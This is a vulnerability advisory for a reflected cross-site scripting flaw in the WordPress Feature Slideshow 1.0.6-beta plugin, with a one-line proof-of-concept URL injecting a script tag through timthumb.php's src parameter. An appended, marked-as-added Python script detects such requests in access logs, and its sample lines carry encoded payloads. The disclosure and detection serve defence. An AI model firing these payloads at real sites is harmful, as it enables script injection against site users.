WordPress Feature Slideshow plugin version 1.0.6-beta suffers from a reflected cross-site scripting vulnerability.
------------------------------------------------------------------------
Software................WordPress Feature Slideshow 1.0.6-beta
Vulnerability...........Reflected Cross-site Scripting
Download................http://sleek.no/kunder/138
Release Date............1/24/2011
Tested On...............Windows 7 + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
------------------------------------------------------------------------
--Description--
A reflected cross-site scripting vulnerability in WordPress Feature
Slideshow 1.0.6-beta can be exploited to execute arbitrary JavaScript.
--PoC--
http://localhost/wordpress/wp-content/plugins/feature-slideshow/timthumb.php?src=<script>alert(0)</script>
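
Added example, not part of the original advisory or the plugin's code: a log check that flags requests to the plugin's timthumb.php whose src parameter decodes to HTML markup, including double-encoded values. The combined access-log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Path suffix and parameter name come from the PoC URL in the advisory.
TARGET_SUFFIX = "/wp-content/plugins/feature-slideshow/timthumb.php"
PARAM = "src"
# Characters that let a reflected value break out into HTML markup.
MARKUP = re.compile(r'[<>"]')
# Request field of a combined-format access log line (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines, not captured traffic.
PREFIX = '203.0.113.5 - - [24/Jan/2011:10:00:01 +0000] "GET /wordpress' + TARGET_SUFFIX
SAMPLE_LOG = [
    PREFIX + '?src=%3Cscript%3Ealert(0)%3C/script%3E HTTP/1.1" 200 312',
    PREFIX + '?src=%253Cscript%253Ealert(0)%253C/script%253E HTTP/1.1" 200 312',
    PREFIX + '?src=/wp-content/uploads/slide1.jpg&w=600 HTTP/1.1" 200 48211',
]


def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded markup (%253C) is seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_src(log_line):
    """Return the decoded src value if it carries markup, else None."""
    match = REQUEST.search(log_line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    if not url.path.lower().endswith(TARGET_SUFFIX):
        return None
    for raw in parse_qs(url.query, keep_blank_values=True).get(PARAM, []):
        value = fully_decode(raw)  # parse_qs has already decoded once
        if MARKUP.search(value):
            return value
    return None


if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(suspicious_src(line))
```

A legitimate src value is an image path or URL, so any hit is worth reviewing; the same character test can serve as a server-side input check until the plugin is removed or fixed.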